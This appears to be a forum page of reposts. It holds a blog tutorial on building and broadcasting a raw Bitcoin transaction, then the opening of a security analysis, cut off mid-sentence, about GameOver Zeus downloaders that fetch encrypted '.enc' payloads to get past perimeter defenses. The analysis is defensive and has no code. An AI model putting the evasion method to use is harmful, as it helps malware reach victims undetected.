-
Posts
18785 -
Joined
-
Last visited
-
Days Won
738
Everything posted by Nytro
-
Bitcoins the hard way: Using the raw Bitcoin protocol All the recent media attention on Bitcoin inspired me to learn how Bitcoin really works, right down to the bytes flowing through the network. Normal people use software[1] that hides what is really going on, but I wanted to get a hands-on understanding of the Bitcoin protocol. My goal was to use the Bitcoin system directly: create a Bitcoin transaction manually, feed it into the system as hex data, and see how it gets processed. This turned out to be considerably harder than I expected, but I learned a lot in the process and hopefully you will find it interesting. This blog post starts with a quick overview of Bitcoin and then jumps into the low-level details: creating a Bitcoin address, making a transaction, signing the transaction, feeding the transaction into the peer-to-peer network, and observing the results. A quick overview of Bitcoin I'll start with a quick overview of how Bitcoin works[2], before diving into the details. Bitcoin is a relatively new digital currency[3] that can be transmitted across the Internet. You can buy bitcoins[4] with dollars or other traditional money from sites such as Coinbase or MtGox[5], send bitcoins to other people, buy things with them at some places, and exchange bitcoins back into dollars. To simplify slightly, bitcoins consist of entries in a distributed database that keeps track of the ownership of bitcoins. Unlike a bank, bitcoins are not tied to users or accounts. Instead bitcoins are owned by a Bitcoin address, for example 1KKKK6N21XKo48zWKuQKXdvSsCf95ibHFa. Bitcoin transactions A transaction is the mechanism for spending bitcoins. In a transaction, the owner of some bitcoins transfers ownership to a new address. A key innovation of Bitcoin is how transactions are recorded in the distributed database through mining. Transactions are grouped into blocks and about every 10 minutes a new block of transactions is sent out, becoming part of the transaction log known as the blockchain, which indicates the transaction has been made (more-or-less) official.[6] Bitcoin mining is the process that puts transactions into a block, to make sure everyone has a consistent view of the transaction log. To mine a block, miners must find an extremely rare solution to an (otherwise-pointless) cryptographic problem. Finding this solution generates a mined block, which becomes part of the official block chain. Mining is also the mechanism for new bitcoins to enter the system. When a block is successfully mined, new bitcoins are generated in the block and paid to the miner. This mining bounty is large - currently 25 bitcoins per block (about $19,000). In addition, the miner gets any fees associated with the transactions in the block. Because of this, mining is very competitive with many people attempting to mine blocks. The difficulty and competitiveness of mining is a key part of Bitcoin security, since it ensures that nobody can flood the system with bad blocks. The peer-to-peer network There is no centralized Bitcoin server. Instead, Bitcoin runs on a peer-to-peer network. If you run a Bitcoin client, you become part of that network. The nodes on the network exchange transactions, blocks, and addresses of other peers with each other. When you first connect to the network, your client downloads the blockchain from some random node or nodes. In turn, your client may provide data to other nodes. When you create a Bitcoin transaction, you send it to some peer, who sends it to other peers, and so on, until it reaches the entire network. Miners pick up your transaction, generate a mined block containing your transaction, and send this mined block to peers. Eventually your client will receive the block and your client shows that the transaction was processed. Cryptography Bitcoin uses digital signatures to ensure that only the owner of bitcoins can spend them. The owner of a Bitcoin address has the private key associated with the address. To spend bitcoins, they sign the transaction with this private key, which proves they are the owner. (It's somewhat like signing a physical check to make it valid.) A public key is associated with each Bitcoin address, and anyone can use it to verify the digital signature. Blocks and transactions are identified by a 256-bit cryptographic hash of their contents. This hash value is used in multiple places in the Bitcoin protocol. In addition, finding a special hash is the difficult task in mining a block. Bitcoins do not really look like this. Photo credit: Antana, CC:by-sa Diving into the raw Bitcoin protocol The remainder of this article discusses, step by step, how I used the raw Bitcoin protocol. First I generated a Bitcoin address and keys. Next I made a transaction to move a small amount of bitcoins to this address. Signing this transaction took me a lot of time and difficulty. Finally, I fed this transaction into the Bitcoin peer-to-peer network and waited for it to get mined. The remainder of this article describes these steps in detail. It turns out that actually using the Bitcoin protocol is harder than I expected. As you will see, the protocol is a bit of a jumble: it uses big-endian numbers, little-endian numbers, fixed-length numbers, variable-length numbers, custom encodings, DER encoding, and a variety of cryptographic algorithms, seemingly arbitrarily. As a result, there's a lot of annoying manipulation to get data into the right format.[7] The second complication with using the protocol directly is that being cryptographic, it is very unforgiving. If you get one byte wrong, the transaction is rejected with no clue as to where the problem is.[8] The final difficulty I encountered is that the process of signing a transaction is much more difficult than necessary, with a lot of details that need to be correct. In particular, the version of a transaction that gets signed is very different from the version that actually gets used. Bitcoin addresses and keys My first step was to create a Bitcoin address. Normally you use Bitcoin client software to create an address and the associated keys. However, I wrote some Python code to create the address, showing exactly what goes on behind the scenes. Bitcoin uses a variety of keys and addresses, so the following diagram may help explain them. You start by creating a random 256-bit private key. The private key is needed to sign a transaction and thus transfer (spend) bitcoins. Thus, the private key must be kept secret or else your bitcoins can be stolen. The Elliptic Curve DSA algorithm generates a 512-bit public key from the private key. (Elliptic curve cryptography will be discussed later.) This public key is used to verify the signature on a transaction. Inconveniently, the Bitcoin protocol adds a prefix of 04 to the public key. The public key is not revealed until a transaction is signed, unlike most systems where the public key is made public. How bitcoin keys and addresses are related The next step is to generate the Bitcoin address that is shared with others. Since the 512-bit public key is inconveniently large, it is hashed down to 160 bits using the SHA-256 and RIPEM hash algorithms.[9] The key is then encoded in ASCII using Bitcoin's custom Base58Check encoding.[10] The resulting address, such as 1KKKK6N21XKo48zWKuQKXdvSsCf95ibHFa, is the address people publish in order to receive bitcoins. Note that you cannot determine the public key or the private key from the address. If you lose your private key (for instance by throwing out your hard drive), your bitcoins are lost forever. Finally, the Wallet Interchange Format key (WIF) is used to add a private key to your client wallet software. This is simply a Base58Check encoding of the private key into ASCII, which is easily reversed to obtain the 256-bit private key. To summarize, there are three types of keys: the private key, the public key, and the hash of the public key, and they are represented externally in ASCII using Base58Check encoding. The private key is the important key, since it is required to access the bitcoins and the other keys can be generated from it. The public key hash is the Bitcoin address you see published. I used the following code snippet[11] to generate a private key in WIF format and an address. The private key is simply a random 256-bit number. The ECDSA crypto library generates the public key from the private key.[12] The Bitcoin address is generated by SHA-256 hashing, RIPEM-160 hashing, and then Base58 encoding with checksum. Finally, the private key is encoded in Base58Check to generate the WIF encoding used to enter a private key into Bitcoin client software.[1] Inside a transaction A transaction is the basic operation in the Bitcoin system. You might expect that a transaction simply moves some bitcoins from one address to another address, but it's more complicated than that. A Bitcoin transaction moves bitcoins between one or more inputs and outputs. Each input is a transaction and address supplying bitcoins. Each output is an address receiving bitcoin, along with the amount of bitcoins going to that address. A sample Bitcoin transaction. Transaction C spends .008 bitcoins from Transactions A and B. The diagram above shows a sample transaction "C". In this transaction, .005 BTC are taken from an address in Transaction A, and .003 BTC are taken from an address in Transaction B. (Note that arrows are references to the previous outputs, so are backwards to the flow of bitcoins.) For the outputs, .003 BTC are directed to the first address and .004 BTC are directed to the second address. The leftover .001 BTC goes to the miner of the block as a fee. Note that the .015 BTC in the other output of Transaction A is not spent in this transaction. Each input used must be entirely spent in a transaction. If an address received 100 bitcoins in a transaction and you just want to spend 1 bitcoin, the transaction must spend all 100. The solution is to use a second output for change, which returns the 99 leftover bitcoins back to you. Transactions can also include fees. If there are any bitcoins left over after adding up the inputs and subtracting the outputs, the remainder is a fee paid to the miner. The fee isn't strictly required, but transactions without a fee will be a low priority for miners and may not be processed for days or may be discarded entirely.[13] A typical fee for a transaction is 0.0002 bitcoins (about 20 cents), so fees are low but not trivial. Manually creating a transaction For my experiment I used a simple transaction with one input and one output, which is shown below. I started by bying bitcoins from Coinbase and putting 0.00101234 bitcoins into address 1MMMMSUb1piy2ufrSguNUdFmAcvqrQF8M5, which was transaction 81b4c832.... My goal was to create a transaction to transfer these bitcoins to the address I created above, 1KKKK6N21XKo48zWKuQKXdvSsCf95ibHFa, subtracting a fee of 0.0001 bitcoins. Thus, the destination address will receive 0.00091234 bitcoins. Structure of the example Bitcoin transaction. Following the specification, the unsigned transaction can be assembled fairly easily, as shown below. There is one input, which is using output 0 (the first output) from transaction 81b4c832.... Note that this transaction hash is inconveniently reversed in the transaction. The output amount is 0.00091234 bitcoins (91234 is 0x016462 in hex), which is stored in the value field in little-endian form. The cryptographic parts - scriptSig and scriptPubKey - are more complex and will be discussed later. [TABLE=class: tx] [TR] [TD=colspan: 2]version[/TD] [TD]01 00 00 00[/TD] [/TR] [TR] [TD=colspan: 2]input count[/TD] [TD]01[/TD] [/TR] [TR] [TD]input[/TD] [TD=class: txindent]previous output hash (reversed)[/TD] [TD]48 4d 40 d4 5b 9e a0 d6 52 fc a8 25 8a b7 ca a4 25 41 eb 52 97 58 57 f9 6f b5 0c d7 32 c8 b4 81[/TD] [/TR] [TR] [TD=class: txindent]previous output index[/TD] [TD]00 00 00 00[/TD] [/TR] [TR] [TD=class: txindent]script length[/TD] [TD][/TD] [/TR] [TR] [TD=class: txindent]scriptSig[/TD] [TD]script containing signature[/TD] [/TR] [TR] [TD=class: txindent]sequence[/TD] [TD]ff ff ff ff[/TD] [/TR] [TR] [TD=colspan: 2]output count[/TD] [TD]01[/TD] [/TR] [TR] [TD]output[/TD] [TD=class: txindent]value[/TD] [TD]62 64 01 00 00 00 00 00[/TD] [/TR] [TR] [TD=class: txindent]script length[/TD] [TD][/TD] [/TR] [TR] [TD=class: txindent]scriptPubKey[/TD] [TD]script containing destination address[/TD] [/TR] [TR] [TD=colspan: 2]block lock time[/TD] [TD]00 00 00 00[/TD] [/TR] [/TABLE] Here's the code I used to generate this unsigned transaction. It's just a matter of packing the data into binary. Signing the transaction is the hard part, as you'll see next. How Bitcoin transactions are signed The following diagram gives a simplified view of how transactions are signed and linked together.[14] Consider the middle transaction, transferring bitcoins from address B to address C. The contents of the transaction (including the hash of the previous transaction) are hashed and signed with B's private key. In addition, B's public key is included in the transaction. By performing several steps, anyone can verify that the transaction is authorized by B. First, B's public key must correspond to B's address in the previous transaction, proving the public key is valid. (The address can easily be derived from the public key, as explained earlier.) Next, B's signature of the transaction can be verified using the B's public key in the transaction. These steps ensure that the transaction is valid and authorized by B. One unexpected part of Bitcoin is that B's public key isn't made public until it is used in a transaction. With this system, bitcoins are passed from address to address through a chain of transactions. Each step in the chain can be verified to ensure that bitcoins are being spent validly. Note that transactions can have multiple inputs and outputs in general, so the chain branches out into a tree. How Bitcoin transactions are chained together.[14] The Bitcoin scripting language You might expect that a Bitcoin transaction is signed simply by including the signature in the transaction, but the process is much more complicated. In fact, there is a small program inside each transaction that gets executed to decide if a transaction is valid. This program is written in Script, the stack-based Bitcoin scripting language. Complex redemption conditions can be expressed in this language. For instance, an escrow system can require two out of three specific users must sign the transaction to spend it. Or various types of contracts can be set up.[15] The Script language is surprisingly complex, with about 80 different opcodes. It includes arithmetic, bitwise operations, string operations, conditionals, and stack manipulation. The language also includes the necessary cryptographic operations (SHA-256, RIPEM, etc.) as primitives. In order to ensure that scripts terminate, the language does not contain any looping operations. (As a consequence, it is not Turing-complete.) In practice, however, only a few types of transactions are supported.[16] In order for a Bitcoin transaction to be valid, the two parts of the redemption script must run successfully. The script in the old transaction is called scriptPubKey and the script in the new transaction is called scriptSig. To verify a transaction, the scriptSig executed followed by the scriptPubKey. If the script completes successfully, the transaction is valid and the Bitcoin can be spent. Otherwise, the transaction is invalid. The point of this is that the scriptPubKey in the old transaction defines the conditions for spending the bitcoins. The scriptSig in the new transaction must provide the data to satisfy the conditions. In a standard transaction, the scriptSig pushes the signature (generated from the private key) to the stack, followed by the public key. Next, the scriptPubKey (from the source transaction) is executed to verify the public key and then verify the signature. As expressed in Script, the scriptSig is: PUSHDATA signature data and SIGHASH_ALL PUSHDATA public key data The scriptPubKey is: OP_DUP OP_HASH160 PUSHDATA Bitcoin address (public key hash) OP_EQUALVERIFY OP_CHECKSIG When this code executes, PUSHDATA first pushes the signature to the stack. The next PUSHDATA pushes the public key to the stack. Next, OP_DUP duplicates the public key on the stack. OP_HASH160 computes the 160-bit hash of the public key. PUSHDATA pushes the required Bitcoin address. Then OP_EQUALVERIFY verifies the top two stack values are equal - that the public key hash from the new transaction matches the address in the old address. This proves that the public key is valid. Next, OP_CHECKSIG checks that the signature of the transaction matches the public key and signature on the stack. This proves that the signature is valid. Signing the transaction I found signing the transaction to be the hardest part of using Bitcoin manually, with a process that is surprisingly difficult and error-prone. The basic idea is to use the ECDSA elliptic curve algorithm and the private key to generate a digital signature of the transaction, but the details are tricky. The signing process has been described through a 19-step process (more info). Click the thumbnail below for a detailed diagram of the process. The biggest complication is the signature appears in the middle of the transaction, which raises the question of how to sign the transaction before you have the signature. To avoid this problem, the scriptPubKey script is copied from the source transaction into the spending transaction (i.e. the transaction that is being signed) before computing the signature. Then the signature is turned into code in the Script language, creating the scriptSig script that is embedded in the transaction. It appears that using the previous transaction's scriptPubKey during signing is for historical reasons rather than any logical reason.[17] For transactions with multiple inputs, signing is even more complicated since each input requires a separate signature, but I won't go into the details. One step that tripped me up is the hash type. Before signing, the transaction has a hash type constant temporarily appended. For a regular transaction, this is SIGHASH_ALL (0x00000001). After signing, this hash type is removed from the end of the transaction and appended to the scriptSig. Another annoying thing about the Bitcoin protocol is that the signature and public key are both 512-bit elliptic curve values, but they are represented in totally different ways: the signature is encoded with DER encoding but the public key is represented as plain bytes. In addition, both values have an extra byte, but positioned inconsistently: SIGHASH_ALL is put after the signature, and type 04 is put before the public key. Debugging the signature was made more difficult because the ECDSA algorithm uses a random number.[18] Thus, the signature is different every time you compute it, so it can't be compared with a known-good signature. With these complications it took me a long time to get the signature to work. Eventually, though, I got all the bugs out of my signing code and succesfully signed a transaction. Here's the code snippet I used. The final scriptSig contains the signature along with the public key for the source address (1MMMMSUb1piy2ufrSguNUdFmAcvqrQF8M5). This proves I am allowed to spend these bitcoins, making the transaction valid. [TABLE=class: tx] [TR] [TD=colspan: 2]PUSHDATA 47[/TD] [TD]47[/TD] [/TR] [TR] [TD]signature (DER)[/TD] [TD]sequence[/TD] [TD]30[/TD] [/TR] [TR] [TD=class: txindent]length[/TD] [TD]44[/TD] [/TR] [TR] [TD=class: txindent]integer[/TD] [TD]02[/TD] [/TR] [TR] [TD=class: txindent2]length[/TD] [TD]20[/TD] [/TR] [TR] [TD=class: txindent2]X[/TD] [TD]2c b2 65 bf 10 70 7b f4 93 46 c3 51 5d d3 d1 6f c4 54 61 8c 58 ec 0a 0f f4 48 a6 76 c5 4f f7 13[/TD] [/TR] [TR] [TD=class: txindent]integer[/TD] [TD]02[/TD] [/TR] [TR] [TD=class: txindent2]length[/TD] [TD]20[/TD] [/TR] [TR] [TD=class: txindent2]Y[/TD] [TD] 6c 66 24 d7 62 a1 fc ef 46 18 28 4e ad 8f 08 67 8a c0 5b 13 c8 42 35 f1 65 4e 6a d1 68 23 3e 82[/TD] [/TR] [TR] [TD=class: txindent, colspan: 2]SIGHASH_ALL[/TD] [TD]01[/TD] [/TR] [TR] [TD=colspan: 2]PUSHDATA 41[/TD] [TD]41[/TD] [/TR] [TR] [TD]public key[/TD] [TD]type[/TD] [TD]04[/TD] [/TR] [TR] [TD]X[/TD] [TD]14 e3 01 b2 32 8f 17 44 2c 0b 83 10 d7 87 bf 3d 8a 40 4c fb d0 70 4f 13 5b 6a d4 b2 d3 ee 75 13[/TD] [/TR] [TR] [TD]Y[/TD] [TD] 10 f9 81 92 6e 53 a6 e8 c3 9b d7 d3 fe fd 57 6c 54 3c ce 49 3c ba c0 63 88 f2 65 1d 1a ac bf cd[/TD] [/TR] [/TABLE] The final scriptPubKey contains the script that must succeed to spend the bitcoins. Note that this script is executed at some arbitrary time in the future when the bitcoins are spent. It contains the destination address (1KKKK6N21XKo48zWKuQKXdvSsCf95ibHFa) expressed in hex, not Base58Check. The effect is that only the owner of the private key for this address can spend the bitcoins, so that address is in effect the owner. [TABLE=class: tx] [TR] [TD]OP_DUP[/TD] [TD]76[/TD] [/TR] [TR] [TD]OP_HASH160[/TD] [TD]a9[/TD] [/TR] [TR] [TD]PUSHDATA 14[/TD] [TD]14[/TD] [/TR] [TR] [TD=class: txindent]public key hash[/TD] [TD]c8 e9 09 96 c7 c6 08 0e e0 62 84 60 0c 68 4e d9 04 d1 4c 5c[/TD] [/TR] [TR] [TD]OP_EQUALVERIFY[/TD] [TD]88[/TD] [/TR] [TR] [TD]OP_CHECKSIG[/TD] [TD]ac[/TD] [/TR] [/TABLE] The final transaction Once all the necessary methods are in place, the final transaction can be assembled. The final transaction is shown below. This combines the scriptSig and scriptPubKey above with the unsigned transaction described earlier. [TABLE=class: tx] [TR] [TD=colspan: 2]version[/TD] [TD]01 00 00 00[/TD] [/TR] [TR] [TD=colspan: 2]input count[/TD] [TD]01[/TD] [/TR] [TR] [TD]input[/TD] [TD=class: txindent]previous output hash (reversed)[/TD] [TD]48 4d 40 d4 5b 9e a0 d6 52 fc a8 25 8a b7 ca a4 25 41 eb 52 97 58 57 f9 6f b5 0c d7 32 c8 b4 81[/TD] [/TR] [TR] [TD=class: txindent]previous output index[/TD] [TD]00 00 00 00[/TD] [/TR] [TR] [TD=class: txindent]script length[/TD] [TD]8a[/TD] [/TR] [TR] [TD=class: txindent]scriptSig[/TD] [TD]47 30 44 02 20 2c b2 65 bf 10 70 7b f4 93 46 c3 51 5d d3 d1 6f c4 54 61 8c 58 ec 0a 0f f4 48 a6 76 c5 4f f7 13 02 20 6c 66 24 d7 62 a1 fc ef 46 18 28 4e ad 8f 08 67 8a c0 5b 13 c8 42 35 f1 65 4e 6a d1 68 23 3e 82 01 41 04 14 e3 01 b2 32 8f 17 44 2c 0b 83 10 d7 87 bf 3d 8a 40 4c fb d0 70 4f 13 5b 6a d4 b2 d3 ee 75 13 10 f9 81 92 6e 53 a6 e8 c3 9b d7 d3 fe fd 57 6c 54 3c ce 49 3c ba c0 63 88 f2 65 1d 1a ac bf cd[/TD] [/TR] [TR] [TD=class: txindent]sequence[/TD] [TD]ff ff ff ff[/TD] [/TR] [TR] [TD=colspan: 2]output count[/TD] [TD]01[/TD] [/TR] [TR] [TD]output[/TD] [TD=class: txindent]value[/TD] [TD]62 64 01 00 00 00 00 00[/TD] [/TR] [TR] [TD=class: txindent]script length[/TD] [TD]19[/TD] [/TR] [TR] [TD=class: txindent]scriptPubKey[/TD] [TD]76 a9 14 c8 e9 09 96 c7 c6 08 0e e0 62 84 60 0c 68 4e d9 04 d1 4c 5c 88 ac[/TD] [/TR] [TR] [TD=colspan: 2]block lock time[/TD] [TD]00 00 00 00[/TD] [/TR] [/TABLE] A tangent: understanding elliptic curves Bitcoin uses elliptic curves as part of the signing algorithm. I had heard about elliptic curves before in the context of solving Fermat's Last Theorem, so I was curious about what they are. The mathematics of elliptic curves is interesting, so I'll take a detour and give a quick overview. The name elliptic curve is confusing: elliptic curves are not ellipses, do not look anything like ellipses, and they have very little to do with ellipses. An elliptic curve is a curve satisfying the fairly simple equation y^2 = x^3 + ax + b. Bitcoin uses a specific elliptic curve called secp256k1 with the simple equation y^2=x^3+7. [25] Elliptic curve formula used by Bitcoin. An important property of elliptic curves is that you can define addition of points on the curve with a simple rule: if you draw a straight line through the curve and it hits three points A, B, and C, then addition is defined by A+B+C=0. Due to the special nature of elliptic curves, addition defined in this way works "normally" and forms a group. With addition defined, you can define integer multiplication: e.g. 4A = A+A+A+A. What makes elliptic curves useful cryptographically is that it's fast to do integer multiplication, but division basically requires brute force. For example, you can compute a product such as 12345678*A = Q really quickly (by computing powers of 2), but if you only know A and Q solving n*A = Q is hard. In elliptic curve cryptography, the secret number 12345678 would be the private key and the point Q on the curve would be the public key. In cryptography, instead of using real-valued points on the curve, the coordinates are integers modulo a prime.[19] One of the surprising properties of elliptic curves is the math works pretty much the same whether you use real numbers or modulo arithmetic. Because of this, Bitcoin's elliptic curve doesn't look like the picture above, but is a random-looking mess of 256-bit points (imagine a big gray square of points). The Elliptic Curve Digital Signature Algorithm (ECDSA) takes a message hash, and then does some straightforward elliptic curve arithmetic using the message, the private key, and a random number[18] to generate a new point on the curve that gives a signature. Anyone who has the public key, the message, and the signature can do some simple elliptic curve arithmetic to verify that the signature is valid. Thus, only the person with the private key can sign a message, but anyone with the public key can verify the message. For more on elliptic curves, see the references[20]. Sending my transaction into the peer-to-peer network Leaving elliptic curves behind, at this point I've created a transaction and signed it. The next step is to send it into the peer-to-peer network, where it will be picked up by miners and incorporated into a block. How to find peers The first step in using the peer-to-peer network is finding a peer. The list of peers changes every few seconds, whenever someone runs a client. Once a node is connected to a peer node, they share new peers by exchanging addr messages whenever a new peer is discovered. Thus, new peers rapidly spread through the system. There's a chicken-and-egg problem, though, of how to find the first peer. Bitcoin clients solve this problem with several methods. Several reliable peers are registered in DNS under the name bitseed.xf2.org. By doing a nslookup, a client gets the IP addresses of these peers, and hopefully one of them will work. If that doesn't work, a seed list of peers is hardcoded into the client. [26] nslookup can be used to find Bitcoin peers. Peers enter and leave the network when ordinary users start and stop Bitcoin clients, so there is a lot of turnover in clients. The clients I use are unlikely to be operational right now, so you'll need to find new peers if you want to do experiments. You may need to try a bunch to find one that works. Talking to peers Once I had the address of a working peer, the next step was to send my transaction into the peer-to-peer network.[8] Using the peer-to-peer protocol is pretty straightforward. I opened a TCP connection to an arbitrary peer on port 8333, started sending messages, and received messages in turn. The Bitcoin peer-to-peer protocol is pretty forgiving; peers would keep communicating even if I totally messed up requests. The protocol consists of about 24 different message types. Each message is a fairly straightforward binary blob containing an ASCII command name and a binary payload appropriate to the command. The protocol is well-documented on the Bitcoin wiki. The first step when connecting to a peer is to establish the connection by exchanging version messages. First I send a version message with my protocol version number[21], address, and a few other things. The peer sends its version message back. After this, nodes are supposed to acknowledge the version message with a verack message. (As I mentioned, the protocol is forgiving - everything works fine even if I skip the verack.) Generating the version message isn't totally trivial since it has a bunch of fields, but it can be created with a few lines of Python. makeMessage below builds an arbitrary peer-to-peer message from the magic number, command name, and payload. getVersionMessage creates the payload for a version message by packing together the various fields. Sending a transaction: tx I sent the transaction into the peer-to-peer network with the stripped-down Python script below. The script sends a version message, receives (and ignores) the peer's version and verack messages, and then sends the transaction as a tx message. The hex string is the transaction that I created earlier. The following screenshot shows how sending my transaction appears in the Wireshark network analysis program[22]. I wrote Python scripts to process Bitcoin network traffic, but to keep things simple I'll just use Wireshark here. The "tx" message type is visible in the ASCII dump, followed on the next line by the start of my transaction (01 00 ...). A transaction uploaded to Bitcoin, as seen in Wireshark. To monitor the progress of my transaction, I had a socket opened to another random peer. Five seconds after sending my transaction, the other peer sent me a tx message with the hash of the transaction I just sent. Thus, it took just a few seconds for my transaction to get passed around the peer-to-peer network, or at least part of it. Victory: my transaction is mined After sending my transaction into the peer-to-peer network, I needed to wait for it to be mined before I could claim victory. Ten minutes later my script received an inv message with a new block (see Wireshark trace below). Checking this block showed that it contained my transaction, proving my transaction worked. I could also verify the success of this transaction by looking in my Bitcoin wallet and by checking online. Thus, after a lot of effort, I had successfully created a transaction manually and had it accepted by the system. (Needless to say, my first few transaction attempts weren't successful - my faulty transactions vanished into the network, never to be seen again.[8]) A new block in Bitcoin, as seen in Wireshark. My transaction was mined by the large GHash.IO mining pool, into block #279068 with hash 0000000000000001a27b1d6eb8c405410398ece796e742da3b3e35363c2219ee. (The hash is reversed in inv message above: ee19...) Note that the hash starts with a large number of zeros - finding such a literally one in a quintillion value is what makes mining so difficult. This particular block contains 462 transactions, of which my transaction is just one. For mining this block, the miners received the reward of 25 bitcoins, and total fees of 0.104 bitcoins, approximately $19,000 and $80 respectively. I paid a fee of 0.0001 bitcoins, approximately 8 cents or 10% of my transaction. The mining process is very interesting, but I'll leave that for a future article. Bitcoin mining normally uses special-purpose ASIC hardware, designed to compute hashes at high speed. Photo credit: Gastev, CC:by Conclusion Using the raw Bitcoin protocol turned out to be harder than I expected, but I learned a lot about bitcoins along the way, and I hope you did too. My full code is available on GitHub.[23] My code is purely for demonstration - if you actually want to use bitcoins through Python, use a real library[24] rather than my code. Notes and references [1] The original Bitcoin client is Bitcoin-qt. In case you're wondering why qt, the client uses the common Qt UI framework. Alternatively you can use wallet software that doesn't participate in the peer-to-peer network, such as Armory or MultiBit. Or you can use an online wallet such as Blockchain.info. [2] A couple good articles on Bitcoin are How it works and the very thorough How the Bitcoin protocol actually works. [3] The original Bitcoin paper is Bitcoin: A Peer-to-Peer Electronic Cash System written by the pseudonymous Satoshi Nakamoto in 2008. The true identity of Satoshi Nakamoto is unknown, although there are many theories. [4] You may have noticed that sometimes Bitcoin is capitalized and sometimes not. It's not a problem with my shift key - the "official" style is to capitalize Bitcoin when referring to the system, and lower-case bitcoins when referring to the currency units. [5] In case you're wondering how the popular MtGox Bitcoin exchange got its name, it was originally a trading card exchange called "Magic: The Gathering Online Exchange" and later took the acronym as its name. [6] For more information on what data is in the blockchain, see the very helpful article Bitcoin, litecoin, dogecoin: How to explore the block chain. [7] I'm not the only one who finds the Bitcoin transaction format inconvenient. For a rant on how messed up it is, see Criticisms of Bitcoin's raw txn format. [8] You can also generate transaction and send raw transactions into the Bitcoin network using the bitcoin-qt console. Type sendrawtransaction a1b2c3d4.... This has the advantage of providing information in the debug log if the transaction is rejected. If you just want to experiment with the Bitcoin network, this is much, much easier than my manual approach. [9] Apparently there's no solid reason to use RIPEM-160 hashing to create the address and SHA-256 hashing elsewhere, beyond a vague sense that using a different hash algorithm helps security. See discussion. Using one round of SHA-256 is subject to a length extension attack, which explains why double-hashing is used. [10] The Base58Check algorithm is documented on the Bitcoin wiki. It is similar to base 64 encoding, except it omits the O, 0, I, and l characters to avoid ambiguity in printed text. A 4-byte checksum guards against errors, since using an erroneous bitcoin address will cause the bitcoins to be lost forever. [11] Some boilerplate has been removed from the code snippets. For the full Python code, see GitHub. You will also need the ecdsa cryptography library. [12] You may wonder how I ended up with addresses with nonrandom prefixes such as 1MMMM. The answer is brute force - I ran the address generation script overnight and collected some good addresses. (These addresses made it much easier to recognize my transactions in my testing.) There are scripts and websites that will generate these "vanity" addresses for you. [13] For a summary of Bitcoin fees, see bitcoinfees.com. This recent Reddit discussion of fees is also interesting. [14] The original Bitcoin paper has a similar figure showing how transactions are chained together. I find it very confusing though, since it doesn't distinguish between the address and the public key. [15] For details on the different types of contracts that can be set up with Bitcoin, see Contracts. One interesting type is the 2-of-3 escrow transaction, where two out of three parties must sign the transaction to release the bitcoins. Bitrated is one site that provides these. [16] Although Bitcoin's Script language is very flexible, the Bitcoin network only permits a few standard transaction types and non-standard transactions are not propagated (details). Some miners will accept non-standard transactions directly, though. [17] There isn't a security benefit from copying the scriptPubKey into the spending transaction before signing since the hash of the original transaction is included in the spending transaction. For discussion, see Why TxPrev.PkScript is inserted into TxCopy during signature check? [18] The random number used in the elliptic curve signature algorithm is critical to the security of signing. Sony used a constant instead of a random number in the PlayStation 3, allowing the private key to be determined. In an incident related to Bitcoin, a weakness in the random number generator allowed bitcoins to be stolen from Android clients. [19] For Bitcoin, the coordinates on the elliptic curve are integers modulo the prime2^256 - 2^32 - 2^9 -2^8 - 2^7 - 2^6 -2^4 -1, which is very nearly 2^256. This is why the keys in Bitcoin are 256-bit keys. [20] For information on the historical connection between elliptic curves and ellipses (the equation turns up when integrating to compute the arc length of an ellipse) see the interesting article Why Ellipses Are Not Elliptic Curves, Adrian Rice and Ezra Brown, Mathematics Magazine, vol. 85, 2012, pp. 163-176. For more introductory information on elliptic curve cryptography, see ECC tutorial or A (Relatively Easy To Understand) Primer on Elliptic Curve Cryptography. For more on the mathematics of elliptic curves, see An Introduction to the Theory of Elliptic Curves by Joseph H. Silverman. Three Fermat trails to elliptic curves includes a discussion of how Fermat's Last Theorem was solved with elliptic curves. [21] There doesn't seem to be documentation on the different Bitcoin protocol versions other than the code. I'm using version 60002 somewhat arbitrarily. [22] The Wireshark network analysis software can dump out most types of Bitcoin packets, but only if you download a recent "beta release - I'm using version 1.11.2. [23] The full code for my examples is available on GitHub. [24] Several Bitcoin libraries in Python are bitcoin-python, pycoin, and python-bitcoinlib. [25] The elliptic curve plot was generated from the Sage mathematics package: var("x y") implicit_plot(y^2-x^3-7, (x,-10, 10), (y,-10, 10), figsize=3, title="y^2=x^3+7") [26] The hardcoded peer list in the Bitcoin client is in chainparams.cpp in the array pnseed. For more information on finding Bitcoin peers, see How Bitcoin clients find each other or Satoshi client node discovery. Tweet Posted by Ken Shirriff at 8:47 AM Sursa: Ken Shirriff's blog: Bitcoins the hard way: Using the raw Bitcoin protocol
-
GameOver Zeus now uses Encryption to bypass Perimeter Security The criminals behind the malware delivery system for GameOver Zeus have a new trick. Encrypting their EXE file so that as it passes through your firewall, webfilters, network intrusion detection systems and any other defenses you may have in place, it is doing so as a non-executable ".ENC" file. If you are in charge of network security for your Enterprise, you may want to check your logs to see how many .ENC files have been downloaded recently. Malcovery Security's malware analyst Brendan Griffin let me know about this new behavior on January 27, 2014, and has seen it consistently since that time. On February 1st, I reviewed the reports that Malcovery's team produced and decided that this was a trend we needed to share more broadly than just to the subscribers of our "Today's Top Threat" reports. Subscribers would have been alerted to each of these campaigns, often within minutes of the beginning of the campaign. We sent copies of all the malware below to dozens of security researchers and to law enforcement. We also made sure that we had uploaded all of these files to VirusTotal which is a great way to let "the industry" know about new malware. I am grateful to William MacArthur of GoDaddy, Brett Stone-Gross of Dell Secure Works, and Boldizsár Bencsáth from CrySys Lab in Hungary who were three researchers who jumped in to help look at this with us. Hopefully others will share insights as well, so this will be an on-going conversation. To review the process, Cutwail is a spamming botnet that since early fall 2013 has been primarily distributing UPATRE malware via Social Engineering. The spam message is designed to convince the recipient that it would be appropriate for them to open the attached .zip file. These .zip files contain a small .exe file whose primary job is to go out to the Internet and download larger more sophisticated malware that would never pass through spam filters without causing alarm, but because of the way our perimeter security works, are often allowed to be downloaded by a logged in user from their workstation. As our industry became better at detecting these downloads, the criminals have had a slightly more difficult time infecting people. With the change last week, the new detection rate for the Zeus downloads has consistently been ZERO of FIFTY at VirusTotal. (For example, here is the "Ring Central" .enc file from Friday on VirusTotal -- al3101.enc. Note the timestamp. That was a rescan MORE THAN TWENTY-FOUR HOURS AFTER INITIAL DISTRIBUTION, and it still says 0 of 50. Why? Well, because technically, it isn't malware. It doesn't actually execute! All Windows EXE files start with the bytes "MZ". These files start with "ZZP". They aren't executable, so how could they be malware? Except they are. In the new delivery model, the .zip file attached to the email has a NEW version of UPATRE that first downloads the .enc file from the Internet and then DECRYPTS the file, placing it in a new location with a new filename, and then causing it both to 